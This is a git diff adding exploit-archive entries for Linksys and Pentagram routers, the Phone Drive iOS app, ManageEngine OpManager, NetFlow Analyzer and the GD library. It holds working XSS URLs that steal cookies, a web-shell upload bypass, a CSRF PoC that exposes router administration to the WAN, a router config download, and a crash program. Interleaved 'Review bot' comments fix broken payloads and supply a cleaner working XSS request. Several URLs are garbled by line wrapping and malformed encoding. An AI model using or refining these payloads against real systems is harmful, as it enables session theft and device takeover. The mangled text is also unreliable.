+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials, cause denial-of-service conditions, and launch other attacks.
+
+Successful exploits will allow script code to be stored persistently in the affected device.
+
+Linksys Wireless-G ADSL Gateway WAG54GS running firmware V1.00.06 is reported vulnerable.
+
+http://admin:admin@192.168.1.1/setup.cgi?user_list=1&sysname=admin& sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http _wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_e nable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged= yes&h_remote_management=enable&c4_trap_ip_=">
\ No newline at end of file
diff --git a/platforms/hardware/webapps/30245.txt b/platforms/hardware/webapps/30245.txt
new file mode 100755
index 000000000..98baa0938
--- /dev/null
+++ b/platforms/hardware/webapps/30245.txt
@@ -0,0 +1,311 @@ +Document Title: +=============== +Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1168 + + +Release Date: +============= +2013-12-11 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1168 + + +Common Vulnerability Scoring System: +==================================== +7.6 + + +Product & Service Introduction: +=============================== +Phone Drive allows you to store, view and manage files on your iPhone or iPad. You can connect to Phone Drive from any Mac or +PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. Phone Drive +features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most +of the file operations: like delete, move, copy, email, share, zip, unzip and more. + +(Copy of the Homepage: https://itunes.apple.com/de/app/phone-drive/id431033044 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Eigthythree Phone Drive v4.1.1 iOS mobile application. + + +Vulnerability Disclosure Timeline: +================================== +2013-12-11: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Eightythree Technologies +Product: Phone Drive - Mobile Application 4.1.1 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local command/path injection web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS. 
+The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application. + +The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are +able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector +in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high +with a cvss (common vulnerability scoring system) count of 7.0(+)|(-)7.1. + +Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access +and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific +commands or unauthorized path requests. + +Request Method(s): + [+] [GET] + +Vulnerable Parameter(s): + [+] devicename + +Affected Module(s): + [+] Index File Dir List - [Header] + + +1.2 +A local file/path include web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS. +The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the web-application. + +The remote file include web vulnerability is located in the vulnerable filename value of the file dir list index module (web interface). +Remote attackers can manipulate the filename value in the POST method request of the file upload form to cpmpromise the mobile application. +Remote attackers are able to include own local files by usage of the file upload module. The attack vector is persistent and the request +method is POST. The file include execute occcurs in the main file dir index list. The security risk of the local file include web +vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+). 
+ +Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. +Successful exploitation of the local web vulnerability results in application or device compromise by unauthorized local file include attacks. + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] File Upload + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:80) + + + +1.3 +An arbitrary file upload web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. + +The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with +multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension +`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file +extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is +estimated as high with a cvss (common vulnerability scoring system) count of 6.6(+). + +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. 
+ + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] File Upload + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:80) + + +1.4 +A persistent input validation web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS. +The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application. + +The persistent input validation vulnerability is located in the foldername (path) value of the folder/path create web-application module. +Remote attackers can inject own malicious script codes as payload to the create folder (path) input field. After the client-side inject +in the POSt method request the payload will be saved and the vector turns into a persistent attack. The persistent execute occurs in the +file dir index- or sub category folder list (http://localhost:8080). Attacker can also inject the script code by the rename of an +exsisting issue. The second execute occurs in the delete notification popup box of the item index list. The security risk of the persistent +input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.9(+). + +Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium +user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account +steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context. 
+ +Request Method(s): + [+] [POST] + +Vulnerable Input(s): + [+] Create Folder + +Vulnerable Parameter(s): + [+] foldername (path) + +Affected Module(s): + [+] Index File Dir Listing (http://localhost:80) + + +Proof of Concept (PoC): +======================= +1.1 +The local command inject web vulnerability can be exploited by local attackers with physical restricted device access and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below. + +PoC: DeviceName - Index File Dir List + + + +

device bkm>"<<>"<../[LOCAL COMMAND/PATH INJECT WEB VULNERABILITY!]">

+ + + + + + +1.2 +The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account and user interaction. +For security demonstration or to reproduce the web vulnerability follow the provided information and steps below. + +PoC: + +[LOCAL FILE INCLUDE VULNERABILITY!] +17.09.2015 18:0724.7 KBSafari Web Archive + + + + + + + + +1.3 +The arbitrary file upload and restricted upload bypass web vulnerability can be exploited by remote attackers without user interaction +or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information +and steps below. + + +PoC Session Logs: qqfile + +Status: 200 OK +POST http://localhost:80/qqfile=arbitrary-file-upload.png.txt.iso.js.html.php.jpg +Load Flags[LOAD_BYPASS_CACHE ] +Content Size[unknown] Mime Type[unknown] + +Request Headers: +Host[192.168.2.106] +User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0] +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] +Accept-Language[en-US,en;q=0.5] +Accept-Encoding[gzip, deflate] +DNT[1] +X-Requested-With[XMLHttpRequest] +X-File-Name[arbitrary-file-upload.png.txt.iso.js.html.php.jpg] +Content-Type[application/octet-stream] +Referer[http://192.168.2.106/] +Content-Length[98139] +Post Data: +POST_DATA[‰PNG + + + +1.4 +The persistent input validation web vulnerability can be exploited by remote attackers without privileged web application user account +and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. 
+ + +PoC: Creat Folder - Index File Dir List & Sub Category List + + + +>"<[PERSISTENT INJECTED SCRIPT CODE!]">11.12.2013 13:29 "pento.cfg" [1] +condis@pandorum:~$ head -n 5 pento.cfg + + + +PENTAGRAM Cerberus P 6363 + + +and now lets try some voodoo magic :x + +condis@pandorum:~$ wget http://192.168.1.100/cgi-bin/DownloadCfg/RouterCfm.cfg -t 1 -nv -O pento.cfg --header="Cookie: admin:language=en" +condis@pandorum:~$ head -n 5 pento.cfg +#Please don't change this file by hand +dhcp_static_lease3= +sb/1/ofdm2gpo=0x66442200 +wl_radius_port=1812 +wl0.1_radius_port=1812 + + +3. Multiple Cross Site Scripting (CWE-79) + +GUI has some simple function that filters out non-alphanumeric characters but it +is written in JavaScript, and as we all know, implementing protection only on +client-side is no protection at all. + +One of attack methods would be to turn off JavaScript or write some simple scripts +(i.e.: using curl, wget, etc) that won't interpret JS code like web browser does. + +Second method (which is preferred by me) is to make configuration backup; modify +it manually changing relevant variables/directives and then reupload it back to +the device. + + +3.1 Setting WI-FI Password + +wl_wpa_psk=wifi_password";alert('XSS');// + +This code will be executed on index page. + + +3.2 Setting URL Filtration + +filter_url0=192.168.1.12-192.168.1.13:bar,0-6,0-0,on,foo");alert('XSS');// + +If "filter_url_mode" is disabled, we must change it to "deny" or "pass". Code +injected here will be executed in Security Settings -> URL Filter Setting page. + + +3.3 Setting MAC Address Filtration + +filter_mac0=DE:AD:DE:AD:DE:AD,0-6,0-0,on,gangbang');alert('xss');// + +If "filter_mac_mode" variable is disabled, we must change it to "deny" or "pass". +Code injected here will be executed in Security Settings -> MAC Address Filter +Settings. + +Probably there are more XSS flaws, but I stopped searching after those three... + + +4. 
Cross Site Request Forgery (CWE-352) + +There is no mechanism preventing CSRF attacks by which it is possible to enforce +any operation on the logged administrator. Below there is simple proof of concept +which enables httpd to WAN (access from IP = 69.69.69.69) : + + +----- cerber_csrf_poc.html ----------------------------------------------------- + + + +----- cerber_csrf_poc.html ----------------------------------------------------- + + +5. Epilogue + +I tried to estalish a dialogue with vendor (07.12.2013) but they didn't respond +for five days (probably they don't give a fuck about security) so I decided to +publish all bugs. + +Also, what's obvious there is no patch so best solution that I can think of now +is to stop using P 6363 and try other version. (P 6362 has different firmware +and at first glance it looked better). diff --git a/platforms/java/webapps/30271.txt b/platforms/java/webapps/30271.txt new file mode 100755 index 000000000..6648d244e --- /dev/null +++ b/platforms/java/webapps/30271.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24767/info + +OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/map/ping.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73% 74%6D%6F%6E%2E%62%6C%F% 67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%2 1%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%7 9%3E \ No newline at end of file 
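Review bot: The percent-encoded payload in the 30271 PoC URL is not valid as written: `%62%6C%F% 67` and `%6D%6F%E%20` each drop a hex digit (`%F%`, `%E%`) and the string contains literal spaces, so a client will reject or mangle it. Decoding the surrounding sequence gives `"><body><h1><p><a href="http://lostmon.blogspot.com">Lostmon Was Here !!!</h1></br>XSS PoW@ !!!!</p><script>alert(document.cookie)</script></body>`, so the broken pieces should read `%62%6C%6F%67` and `%6D%6F%6E%20` with the spaces removed; this looks like a transcription artifact from the SecurityFocus page. Anyone reproducing this only needs the `%3C%73%63%72%69%70%74%3E...%3C%2F%73%63%72%69%70%74%3E` part after the `%22%3E` attribute break; the link to an external blog adds nothing to the demonstration.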
diff --git a/platforms/java/webapps/30272.txt b/platforms/java/webapps/30272.txt new file mode 100755 index 000000000..0289fb636 --- /dev/null +++ b/platforms/java/webapps/30272.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24767/info + +OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/java/webapps/30273.txt b/platforms/java/webapps/30273.txt new file mode 100755 index 000000000..30ccf0293 --- /dev/null +++ b/platforms/java/webapps/30273.txt 
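Review bot: The PoC URL's encoding is broken in two places: `%2E62% 6C` is missing the `%` before `62` (should be `%2E%62%6C`, the `.bl` of the blogspot host) and `%74%D%6F%6E` drops a digit (should be `%74%6D%6F%6E`, `tmon`), and the string also carries literal spaces from line wrapping (`%6C% 6F`, `%40%2 0`, `%3 E`). The decoded payload is the same `"><body>...<script>alert(document.cookie)</script></body>` vector as 30271, only against `traceRoute.do` instead of `ping.do`. Since the request is a bare GET with `name=` echoed into the page, a trimmed working form would be `/map/traceRoute.do?name=192.168.1.2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E`, which avoids the mangled hex entirely.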
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24767/info + +OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/reports/ReportViewAction.do?selected Tab=Reports&selectedNode=Server_Memory_Utilization&reportN ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E %3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F% 6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6 D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20 %21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F% 57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6 1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69 %65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di splayName=webclient.reports.servers.memutil \ No newline at end of file diff --git a/platforms/java/webapps/30274.txt b/platforms/java/webapps/30274.txt new file mode 100755 index 000000000..fe2302a90 --- /dev/null +++ b/platforms/java/webapps/30274.txt 
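Review bot: The parameter names in the 30273 PoC are split by spaces (`selected Tab=Reports`, `reportN ame=`, `di splayName`), and the payload ends with `%3EE&displayName`, i.e. a stray `E` after the encoded `</body>`; both look like line-wrapping and copy artifacts from the source advisory rather than part of the vector. The intended request is presumably `reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_Memory_Utilization&reportName=Utilization_Report%22%3E...%3C%2F%62%6F%64%79%3E&displayName=webclient.reports.servers.memutil`. Worth a one-line note above the URL saying the whitespace must be removed before use, since the encoded hex otherwise decodes correctly here.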
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24767/info + +OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/admin/ServiceConfiguration.do?operati on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7 0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F% 73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E %4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2 1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20% 21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72 %74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2 F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte r&serviceName=Alerter \ No newline at end of file diff --git a/platforms/java/webapps/30275.txt b/platforms/java/webapps/30275.txt new file mode 100755 index 000000000..712550978 --- /dev/null +++ b/platforms/java/webapps/30275.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24767/info + +OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/admin/DeviceAssociation.do?selectedNo de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D %6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3 E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7 0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa me=com.adventnet.me.opmanager.webclient.admin.association.N TServiceAssociation \ No newline at end of file diff --git a/platforms/java/webapps/30276.txt b/platforms/java/webapps/30276.txt new file mode 100755 index 000000000..ae218c99e --- /dev/null +++ b/platforms/java/webapps/30276.txt 
@@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/24767/info + +OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/30266.txt b/platforms/jsp/webapps/30266.txt new file mode 100755 index 000000000..af51f7229 --- /dev/null +++ b/platforms/jsp/webapps/30266.txt 
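Review bot: This file appears to be a byte-for-byte duplicate of 30272.txt earlier in the same commit — same `map/traceRoute.do?name=` endpoint, same payload, and the same mangled encodings (`%2E62% 6C`, `%74%D%6F%6E`, `%3 E`) — so it documents no additional vector. BID 24767 is cited as "multiple" XSS issues, so presumably a sixth distinct URL was intended here and the wrong one was pasted; it would be better to either drop this entry or replace it with the missing vector. At minimum a note pointing at 30272 would stop readers treating it as a separate finding.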
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24766/info + +NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects NetFlow Analyzer 5; other versions may also be affected. + +http://www.example.com/netflow/jspui/applicationList.jsp?alph a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68 %72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F %6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C %2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70 %3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D %65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E %3C%2F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/30267.txt b/platforms/jsp/webapps/30267.txt new file mode 100755 index 000000000..70c205b33 --- /dev/null +++ b/platforms/jsp/webapps/30267.txt 
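Review bot: The parameter name in the PoC URL is broken across a space (`alph a=A`), and the encoded payload carries further literal spaces (`%68 %72`, `%2E %62`, `%6F %6E`, and so on) that a client will not accept; these are line-wrap artifacts and the request should read `/netflow/jspui/applicationList.jsp?alpha=A%22%3E...`. The same wrapping affects the sibling NetFlow Analyzer entries in this commit (`Modif y`, `view= ipgroups`, `view=g roups`, `rtype=g lobal`, `rtype=gl obal`), so a single note in this family, or stripping the whitespace at import time, would save readers the same correction five times. The hex itself decodes cleanly to the `"><body>...<script>alert(document.cookie)</script></body>` vector once the spaces are removed.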
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24766/info + +NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects NetFlow Analyzer 5; other versions may also be affected. + +http://www.example.com/netflow/jspui/appConfig.jsp?task=Modif y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7 2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6 2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6 E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3 E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6 5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3 C%2F%62%6F%64%79%3E&appID=62 \ No newline at end of file diff --git a/platforms/jsp/webapps/30268.txt b/platforms/jsp/webapps/30268.txt new file mode 100755 index 000000000..0fba4bfe6 --- /dev/null +++ b/platforms/jsp/webapps/30268.txt 
@@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/24766/info + +NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects NetFlow Analyzer 5; other versions may also be affected. + + http://www.example.com/netflow/jspui/index.jsp?grID=-1&view= ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61% 20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F% 6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74% 6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31% 3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70% 74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos +http://www.example.com/netflow/jspui/index.jsp?grID=-1&view=g roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20% 68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D% 6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E% 3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F% 70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75% 6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74% 3E%3C%2F%62%6F%64%79%3E&grDisp=1 \ No newline at end of file diff --git a/platforms/jsp/webapps/30269.txt b/platforms/jsp/webapps/30269.txt new file mode 100755 index 000000000..ef5fb39e2 --- /dev/null +++ b/platforms/jsp/webapps/30269.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24766/info + +NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects NetFlow Analyzer 5; other versions may also be affected. + + http://www.example.com/netflow/jspui/selectDevice.jsp?rtype=g lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E %62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F% 6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2 F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65% 6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2 F%62%6F%64%79%3E \ No newline at end of file diff --git a/platforms/jsp/webapps/30270.txt b/platforms/jsp/webapps/30270.txt new file mode 100755 index 000000000..b1279fb45 --- /dev/null +++ b/platforms/jsp/webapps/30270.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/24766/info + +NetFlow Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +This issue affects NetFlow Analyzer 5; other versions may also be affected. + +http://www.example.com/netflow/jspui/customReport.jsp?rtype=gl obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68% 72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62 %6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2 0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62% 72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73 %63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2 E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F% 64%79%3E&period=hourly&customOption=true&firstTime=true \ No newline at end of file diff --git a/platforms/linux/dos/30251.c b/platforms/linux/dos/30251.c new file mode 100755 index 000000000..94e824b5f --- /dev/null +++ b/platforms/linux/dos/30251.c @@ -0,0 +1,20 @@ +source: http://www.securityfocus.com/bid/24651/info + +The GD graphics library is prone to multiple vulnerabilities. + +An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library. + +Version prior to GD graphics library 2.0.35 are reported vulnerable. + +#include "gd.h" + +int main() { + FILE *fp = fopen("./x.xbm", "w+"); + + fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n"); + + fseek(fp, 0, SEEK_SET); + + gdImageCreateFromXbm(fp); + +} 
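Review bot: `fopen` can return NULL and the result is passed straight to `fprintf`, the stream is never closed, and `main` falls off the end without a return; add `if (!fp) return 1;` after the `fopen`, and `fclose(fp); return 0;` after the `gdImageCreateFromXbm` call (if that call returns a non-NULL image on a patched library it should be released with `gdImageDestroy`). The XBM written is deliberately incomplete — no pixel data and no closing `};` — and the `height 1073741824` value is presumably chosen so that `width * height` overflows a 32-bit size computation before any data is read; a comment on the `fprintf` line stating that would tell a reader why the file is malformed rather than leaving it to look like a typo. It also needs saying that the program must be linked against a gd build older than 2.0.35 for the crash to reproduce; on a fixed library it simply returns NULL.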
diff --git a/platforms/linux/local/30280.txt b/platforms/linux/local/30280.txt
new file mode 100755
index 000000000..8e4e2d091
